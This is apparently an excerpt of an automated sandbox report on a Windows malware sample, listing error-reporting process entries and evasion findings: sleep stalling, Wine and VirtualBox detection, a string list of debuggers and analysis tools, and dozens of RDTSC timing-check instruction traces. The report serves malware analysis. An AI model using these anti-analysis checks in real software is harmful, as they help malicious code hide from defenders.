Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior

Malware Analysis System Evasion

barindex
Source: C:\Users\user\AppData\Local\Temp\service123.exe Evasive API call chain: CreateMutex,DecisionNodes,Sleep
Source: C:\Users\user\AppData\Local\Temp\service123.exe Stalling execution: Execution stalls by calling Sleep
Source: C:\Users\user\Desktop\PhwUGyok2i.exe File opened: HKEY_CURRENT_USER\Software\Wine Jump to behavior
Source: C:\Users\user\Desktop\PhwUGyok2i.exe File opened: HKEY_LOCAL_MACHINE\HARDWARE\ACPI\DSDT\VBOX__ Jump to behavior
Source: PhwUGyok2i.exe, 00000000.00000003.2369565851.0000000007300000.00000004.00001000.00020000.00000000.sdmp Binary or memory string: PROCMON.EXE
Source: PhwUGyok2i.exe, 00000000.00000003.2369565851.0000000007300000.00000004.00001000.00020000.00000000.sdmp Binary or memory string: X64DBG.EXE
Source: PhwUGyok2i.exe, 00000000.00000003.2369565851.0000000007300000.00000004.00001000.00020000.00000000.sdmp Binary or memory string: WINDBG.EXE
Source: PhwUGyok2i.exe, 00000000.00000003.2369565851.0000000007300000.00000004.00001000.00020000.00000000.sdmp Binary or memory string: SYSINTERNALSNUM_PROCESSORNUM_RAMNAMEALLFREEDRIVERSNUM_DISPLAYSRESOLUTION_XRESOLUTION_Y\*RECENT_FILESPROCESSESUPTIME_MINUTESC:\WINDOWS\SYSTEM32\VBOX*.DLL01VBOX_FIRSTSYSTEM\CONTROLSET001\SERVICES\VBOXSFVBOX_SECONDC:\USERS\PUBLIC\PUBLIC_CHECKWINDBG.EXEDBGWIRESHARK.EXEPROCMON.EXEX64DBG.EXEIDA.EXEDBG_SECDBG_THIRDYADROINSTALLED_APPSSOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\UNINSTALLSOFTWARE\WOW6432NODE\MICROSOFT\WINDOWS\CURRENTVERSION\UNINSTALL%D%S\%SDISPLAYNAMEAPP_NAMEINDEXCREATETOOLHELP32SNAPSHOT FAILED.
Source: PhwUGyok2i.exe, 00000000.00000003.2369565851.0000000007300000.00000004.00001000.00020000.00000000.sdmp Binary or memory string: WIRESHARK.EXE
Source: C:\Users\user\Desktop\PhwUGyok2i.exe RDTSC instruction interceptor: First address: 154017E second address: 1540196 instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 pop ebx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 push eax 0x00000008 push eax 0x00000009 push edx 0x0000000a pushad 0x0000000b jmp 00007F3E511046AAh 0x00000010 push eax 0x00000011 pop eax 0x00000012 popad 0x00000013 rdtsc
Source: C:\Users\user\Desktop\PhwUGyok2i.exe RDTSC instruction interceptor: First address: 1540196 second address: 154019C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\PhwUGyok2i.exe RDTSC instruction interceptor: First address: 154019C second address: 15401A0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\PhwUGyok2i.exe RDTSC instruction interceptor: First address: 16A9766 second address: 16A977E instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jmp 00007F3E51171E6Bh 0x00000008 pushad 0x00000009 popad 0x0000000a jp 00007F3E51171E66h 0x00000010 push eax 0x00000011 push edx 0x00000012 rdtsc
Source: C:\Users\user\Desktop\PhwUGyok2i.exe RDTSC instruction interceptor: First address: 16A977E second address: 16A9786 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push ecx 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
Source: C:\Users\user\Desktop\PhwUGyok2i.exe RDTSC instruction interceptor: First address: 16A9B3B second address: 16A9B76 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop eax 0x00000005 push ecx 0x00000006 jmp 00007F3E51171E76h 0x0000000b pop ecx 0x0000000c popad 0x0000000d push eax 0x0000000e push edx 0x0000000f jmp 00007F3E51171E77h 0x00000014 push eax 0x00000015 push edx 0x00000016 push esi 0x00000017 pop esi 0x00000018 rdtsc
Source: C:\Users\user\Desktop\PhwUGyok2i.exe RDTSC instruction interceptor: First address: 16A9B76 second address: 16A9B7C instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\PhwUGyok2i.exe RDTSC instruction interceptor: First address: 16A9B7C second address: 16A9BA7 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F3E51171E78h 0x00000007 push esi 0x00000008 jmp 00007F3E51171E6Eh 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
Source: C:\Users\user\Desktop\PhwUGyok2i.exe RDTSC instruction interceptor: First address: 16A9F78 second address: 16A9F98 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F3E511046B9h 0x00000009 pushad 0x0000000a popad 0x0000000b popad 0x0000000c rdtsc
Source: C:\Users\user\Desktop\PhwUGyok2i.exe RDTSC instruction interceptor: First address: 16AC6D7 second address: 16AC712 instructions: 0x00000000 rdtsc 0x00000002 jnc 00007F3E51171E6Ch 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b jmp 00007F3E51171E76h 0x00000010 mov eax, dword ptr [esp+04h] 0x00000014 push eax 0x00000015 push edx 0x00000016 pushad 0x00000017 jns 00007F3E51171E66h 0x0000001d jno 00007F3E51171E66h 0x00000023 popad 0x00000024 rdtsc
Source: C:\Users\user\Desktop\PhwUGyok2i.exe RDTSC instruction interceptor: First address: 16AC879 second address: 16AC8D7 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F3E511046ADh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov eax, dword ptr [eax] 0x0000000b pushad 0x0000000c pushad 0x0000000d jp 00007F3E511046A6h 0x00000013 jmp 00007F3E511046B7h 0x00000018 popad 0x00000019 jmp 00007F3E511046AFh 0x0000001e popad 0x0000001f mov dword ptr [esp+04h], eax 0x00000023 push edx 0x00000024 pushad 0x00000025 jmp 00007F3E511046B3h 0x0000002a push eax 0x0000002b push edx 0x0000002c rdtsc
Source: C:\Users\user\Desktop\PhwUGyok2i.exe RDTSC instruction interceptor: First address: 16AC8D7 second address: 16AC91B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pop edx 0x00000006 pop eax 0x00000007 push 00000003h 0x00000009 push 00000000h 0x0000000b call 00007F3E51171E78h 0x00000010 mov cx, dx 0x00000013 pop edi 0x00000014 push 00000003h 0x00000016 je 00007F3E51171E6Ch 0x0000001c push DA97676Fh 0x00000021 push eax 0x00000022 push edx 0x00000023 js 00007F3E51171E6Ch 0x00000029 push eax 0x0000002a push edx 0x0000002b rdtsc
Source: C:\Users\user\Desktop\PhwUGyok2i.exe RDTSC instruction interceptor: First address: 16AC91B second address: 16AC91F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\PhwUGyok2i.exe RDTSC instruction interceptor: First address: 16AC91F second address: 16AC95C instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushad 0x00000004 popad 0x00000005 jne 00007F3E51171E66h 0x0000000b popad 0x0000000c pop edx 0x0000000d pop eax 0x0000000e xor dword ptr [esp], 1A97676Fh 0x00000015 mov ecx, dword ptr [ebp+12A038D8h] 0x0000001b lea ebx, dword ptr [ebp+12B704E5h] 0x00000021 pushad 0x00000022 pushad 0x00000023 sub dword ptr [ebp+12A0325Bh], eax 0x00000029 sub dword ptr [ebp+12A025DAh], edi 0x0000002f popad 0x00000030 or dword ptr [ebp+12A030A4h], eax 0x00000036 popad 0x00000037 push eax 0x00000038 pushad 0x00000039 push eax 0x0000003a push edx 0x0000003b push ebx 0x0000003c pop ebx 0x0000003d rdtsc
Source: C:\Users\user\Desktop\PhwUGyok2i.exe RDTSC instruction interceptor: First address: 16AC9E4 second address: 16ACA00 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F3E511046B8h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\PhwUGyok2i.exe RDTSC instruction interceptor: First address: 16CB52A second address: 16CB540 instructions: 0x00000000 rdtsc 0x00000002 ja 00007F3E51171E6Ch 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b push edx 0x0000000c push eax 0x0000000d push edx 0x0000000e push esi 0x0000000f pop esi 0x00000010 rdtsc
Source: C:\Users\user\Desktop\PhwUGyok2i.exe RDTSC instruction interceptor: First address: 16CB540 second address: 16CB551 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F3E511046ADh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\PhwUGyok2i.exe RDTSC instruction interceptor: First address: 16CB551 second address: 16CB55E instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push esi 0x00000004 pop esi 0x00000005 jng 00007F3E51171E66h 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
Source: C:\Users\user\Desktop\PhwUGyok2i.exe RDTSC instruction interceptor: First address: 16CB6CD second address: 16CB6D8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 push esi 0x00000007 pop esi 0x00000008 pushad 0x00000009 popad 0x0000000a popad 0x0000000b rdtsc
Source: C:\Users\user\Desktop\PhwUGyok2i.exe RDTSC instruction interceptor: First address: 16CB819 second address: 16CB81D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\PhwUGyok2i.exe RDTSC instruction interceptor: First address: 16CBAAF second address: 16CBAE0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jne 00007F3E511046A6h 0x0000000a jng 00007F3E511046ACh 0x00000010 pop esi 0x00000011 push esi 0x00000012 jp 00007F3E511046BDh 0x00000018 jmp 00007F3E511046B1h 0x0000001d push eax 0x0000001e push edx 0x0000001f rdtsc
Source: C:\Users\user\Desktop\PhwUGyok2i.exe RDTSC instruction interceptor: First address: 16CBC0A second address: 16CBC18 instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 pop ebx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 jnl 00007F3E51171E66h 0x0000000e rdtsc
Source: C:\Users\user\Desktop\PhwUGyok2i.exe RDTSC instruction interceptor: First address: 16CBC18 second address: 16CBC24 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 jo 00007F3E511046A6h 0x0000000a pop edx 0x0000000b pop eax 0x0000000c rdtsc
Source: C:\Users\user\Desktop\PhwUGyok2i.exe RDTSC instruction interceptor: First address: 16CBF06 second address: 16CBF0E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
Source: C:\Users\user\Desktop\PhwUGyok2i.exe RDTSC instruction interceptor: First address: 16CBF0E second address: 16CBF12 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\PhwUGyok2i.exe RDTSC instruction interceptor: First address: 16CBF12 second address: 16CBF2F instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F3E51171E79h 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
Source: C:\Users\user\Desktop\PhwUGyok2i.exe RDTSC instruction interceptor: First address: 16CC075 second address: 16CC095 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 jmp 00007F3E511046B7h 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
Source: C:\Users\user\Desktop\PhwUGyok2i.exe RDTSC instruction interceptor: First address: 16CC095 second address: 16CC09D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pushad 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
Source: C:\Users\user\Desktop\PhwUGyok2i.exe RDTSC instruction interceptor: First address: 16CC09D second address: 16CC0BE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ebx 0x00000005 pop ebx 0x00000006 jmp 00007F3E511046B9h 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
Source: C:\Users\user\Desktop\PhwUGyok2i.exe RDTSC instruction interceptor: First address: 16CC37E second address: 16CC384 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\PhwUGyok2i.exe RDTSC instruction interceptor: First address: 16C2D42 second address: 16C2D46 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\PhwUGyok2i.exe RDTSC instruction interceptor: First address: 16CC4E4 second address: 16CC4EA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\PhwUGyok2i.exe RDTSC instruction interceptor: First address: 16CC4EA second address: 16CC4EE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\PhwUGyok2i.exe RDTSC instruction interceptor: First address: 16CC4EE second address: 16CC4F2 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\PhwUGyok2i.exe RDTSC instruction interceptor: First address: 16CC4F2 second address: 16CC4F8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\PhwUGyok2i.exe RDTSC instruction interceptor: First address: 16CCAB7 second address: 16CCAD1 instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 pop ebx 0x00000004 push ecx 0x00000005 pop ecx 0x00000006 pop edx 0x00000007 pop eax 0x00000008 jmp 00007F3E51171E6Eh 0x0000000d push eax 0x0000000e push edx 0x0000000f pushad 0x00000010 popad 0x00000011 rdtsc
Source: C:\Users\user\Desktop\PhwUGyok2i.exe RDTSC instruction interceptor: First address: 16CCD3C second address: 16CCD40 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\PhwUGyok2i.exe RDTSC instruction interceptor: First address: 16CD186 second address: 16CD19A instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop esi 0x00000007 push eax 0x00000008 push edx 0x00000009 jmp 00007F3E51171E6Bh 0x0000000e rdtsc
Source: C:\Users\user\Desktop\PhwUGyok2i.exe RDTSC instruction interceptor: First address: 16A3AB7 second address: 16A3AD3 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 jmp 00007F3E511046ACh 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push eax 0x0000000c push edx 0x0000000d push edx 0x0000000e pop edx 0x0000000f jne 00007F3E511046A6h 0x00000015 rdtsc
Source: C:\Users\user\Desktop\PhwUGyok2i.exe RDTSC instruction interceptor: First address: 16A3AD3 second address: 16A3AD7 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\PhwUGyok2i.exe RDTSC instruction interceptor: First address: 16D4394 second address: 16D4398 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\PhwUGyok2i.exe RDTSC instruction interceptor: First address: 16D4398 second address: 16D439D instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\PhwUGyok2i.exe RDTSC instruction interceptor: First address: 16D439D second address: 16D43A3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\PhwUGyok2i.exe RDTSC instruction interceptor: First address: 16D43A3 second address: 16D43C7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pop edx 0x00000006 pop eax 0x00000007 push eax 0x00000008 push ecx 0x00000009 pushad 0x0000000a pushad 0x0000000b popad 0x0000000c jnl 00007F3E51171E66h 0x00000012 popad 0x00000013 pop ecx 0x00000014 mov eax, dword ptr [esp+04h] 0x00000018 push eax 0x00000019 push edx 0x0000001a jmp 00007F3E51171E6Ah 0x0000001f rdtsc
Source: C:\Users\user\Desktop\PhwUGyok2i.exe RDTSC instruction interceptor: First address: 16D43C7 second address: 16D43CD instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\PhwUGyok2i.exe RDTSC instruction interceptor: First address: 16D43CD second address: 16D43F2 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 mov eax, dword ptr [eax] 0x0000000a jmp 00007F3E51171E6Dh 0x0000000f mov dword ptr [esp+04h], eax 0x00000013 push eax 0x00000014 push edx 0x00000015 jng 00007F3E51171E68h 0x0000001b pushad 0x0000001c popad 0x0000001d rdtsc
Source: C:\Users\user\Desktop\PhwUGyok2i.exe RDTSC instruction interceptor: First address: 169EC10 second address: 169EC14 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\PhwUGyok2i.exe RDTSC instruction interceptor: First address: 16D7A85 second address: 16D7A8D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push edx 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
Source: C:\Users\user\Desktop\PhwUGyok2i.exe RDTSC instruction interceptor: First address: 16D802B second address: 16D803C instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 pushad 0x00000008 popad 0x00000009 jno 00007F3E511046A6h 0x0000000f push eax 0x00000010 push edx 0x00000011 rdtsc
Source: C:\Users\user\Desktop\PhwUGyok2i.exe RDTSC instruction interceptor: First address: 16D803C second address: 16D804C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push eax 0x00000006 push eax 0x00000007 push edx 0x00000008 ja 00007F3E51171E66h 0x0000000e pushad 0x0000000f popad 0x00000010 rdtsc
Source: C:\Users\user\Desktop\PhwUGyok2i.exe RDTSC instruction interceptor: First address: 16D81B2 second address: 16D81C7 instructions: 0x00000000 rdtsc 0x00000002 jno 00007F3E511046A6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a popad 0x0000000b pushad 0x0000000c push edx 0x0000000d push ecx 0x0000000e pop ecx 0x0000000f pop edx 0x00000010 push esi 0x00000011 push ebx 0x00000012 pop ebx 0x00000013 push eax 0x00000014 push edx 0x00000015 rdtsc
Source: C:\Users\user\Desktop\PhwUGyok2i.exe RDTSC instruction interceptor: First address: 16DB5F6 second address: 16DB5FA instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\PhwUGyok2i.exe RDTSC instruction interceptor: First address: 16DB5FA second address: 16DB62F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop ebx 0x00000007 mov dword ptr [esp+04h], eax 0x0000000b jno 00007F3E511046AEh 0x00000011 pop eax 0x00000012 mov edi, 2BAF20C7h 0x00000017 push 5E7E75DAh 0x0000001c push eax 0x0000001d push edx 0x0000001e jmp 00007F3E511046AFh 0x00000023 rdtsc
Source: C:\Users\user\Desktop\PhwUGyok2i.exe RDTSC instruction interceptor: First address: 16DBB46 second address: 16DBB4A instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\PhwUGyok2i.exe RDTSC instruction interceptor: First address: 16DBD11 second address: 16DBD16 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\PhwUGyok2i.exe RDTSC instruction interceptor: First address: 16DBD16 second address: 16DBD26 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push eax 0x0000000b push edx 0x0000000c push ebx 0x0000000d pushad 0x0000000e popad 0x0000000f pop ebx 0x00000010 rdtsc
Source: C:\Users\user\Desktop\PhwUGyok2i.exe RDTSC instruction interceptor: First address: 16DC7A4 second address: 16DC7AA instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\PhwUGyok2i.exe RDTSC instruction interceptor: First address: 16DC7AA second address: 16DC7AE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\PhwUGyok2i.exe RDTSC instruction interceptor: First address: 16DC8A7 second address: 16DC8C1 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F3E511046B6h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\PhwUGyok2i.exe RDTSC instruction interceptor: First address: 16DC8C1 second address: 16DC8D7 instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 jl 00007F3E51171E66h 0x00000009 pop ebx 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push eax 0x0000000d pushad 0x0000000e push eax 0x0000000f push edx 0x00000010 jnp 00007F3E51171E66h 0x00000016 rdtsc
Source: C:\Users\user\Desktop\PhwUGyok2i.exe RDTSC instruction interceptor: First address: 16DC8D7 second address: 16DC8DB instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\PhwUGyok2i.exe RDTSC instruction interceptor: First address: 16DC9A6 second address: 16DC9B0 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jns 00007F3E51171E66h 0x0000000a rdtsc
Source: C:\Users\user\Desktop\PhwUGyok2i.exe RDTSC instruction interceptor: First address: 16DCF34 second address: 16DCF38 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\PhwUGyok2i.exe RDTSC instruction interceptor: First address: 16DCF38 second address: 16DCF4A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop ebx 0x00000007 push eax 0x00000008 push eax 0x00000009 push edx 0x0000000a push eax 0x0000000b jnl 00007F3E51171E66h 0x00000011 pop eax 0x00000012 rdtsc
Source: C:\Users\user\Desktop\PhwUGyok2i.exe RDTSC instruction interceptor: First address: 16DCF4A second address: 16DCF54 instructions: 0x00000000 rdtsc 0x00000002 js 00007F3E511046ACh 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\PhwUGyok2i.exe RDTSC instruction interceptor: First address: 16DCF54 second address: 16DCFA7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 nop 0x00000007 mov esi, 6492A281h 0x0000000c push 00000000h 0x0000000e push 00000000h 0x00000010 push esi 0x00000011 call 00007F3E51171E68h 0x00000016 pop esi 0x00000017 mov dword ptr [esp+04h], esi 0x0000001b add dword ptr [esp+04h], 0000001Ch 0x00000023 inc esi 0x00000024 push esi 0x00000025 ret 0x00000026 pop esi 0x00000027 ret 0x00000028 mov di, FE59h 0x0000002c push 00000000h 0x0000002e mov dword ptr [ebp+12A0347Dh], edx 0x00000034 mov si, 2DFDh 0x00000038 xchg eax, ebx 0x00000039 push eax 0x0000003a push edx 0x0000003b pushad 0x0000003c jc 00007F3E51171E66h 0x00000042 jnl 00007F3E51171E66h 0x00000048 popad 0x00000049 rdtsc
Source: C:\Users\user\Desktop\PhwUGyok2i.exe RDTSC instruction interceptor: First address: 16DCFA7 second address: 16DCFC2 instructions: 0x00000000 rdtsc 0x00000002 jng 00007F3E511046ACh 0x00000008 jnl 00007F3E511046A6h 0x0000000e pop edx 0x0000000f pop eax 0x00000010 push eax 0x00000011 jng 00007F3E511046B0h 0x00000017 push eax 0x00000018 push edx 0x00000019 pushad 0x0000001a popad 0x0000001b rdtsc
Source: C:\Users\user\Desktop\PhwUGyok2i.exe RDTSC instruction interceptor: First address: 16DD956 second address: 16DD95A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\PhwUGyok2i.exe RDTSC instruction interceptor: First address: 16DFEE7 second address: 16DFF5B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ebx 0x00000005 push eax 0x00000006 jo 00007F3E511046B0h 0x0000000c pushad 0x0000000d push edx 0x0000000e pop edx 0x0000000f jns 00007F3E511046A6h 0x00000015 popad 0x00000016 nop 0x00000017 push eax 0x00000018 jmp 00007F3E511046ACh 0x0000001d pop esi 0x0000001e push 00000000h 0x00000020 push 00000000h 0x00000022 push ebx 0x00000023 call 00007F3E511046A8h 0x00000028 pop ebx 0x00000029 mov dword ptr [esp+04h], ebx 0x0000002d add dword ptr [esp+04h], 00000018h 0x00000035 inc ebx 0x00000036 push ebx 0x00000037 ret 0x00000038 pop ebx 0x00000039 ret 0x0000003a push 00000000h 0x0000003c mov edi, ecx 0x0000003e mov dword ptr [ebp+12A0319Ah], edx 0x00000044 xchg eax, ebx 0x00000045 jne 00007F3E511046BBh 0x0000004b push eax 0x0000004c push eax 0x0000004d push edx 0x0000004e push eax 0x0000004f push edx 0x00000050 push eax 0x00000051 push edx 0x00000052 rdtsc
Source: C:\Users\user\Desktop\PhwUGyok2i.exe RDTSC instruction interceptor: First address: 16DFF5B second address: 16DFF5F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
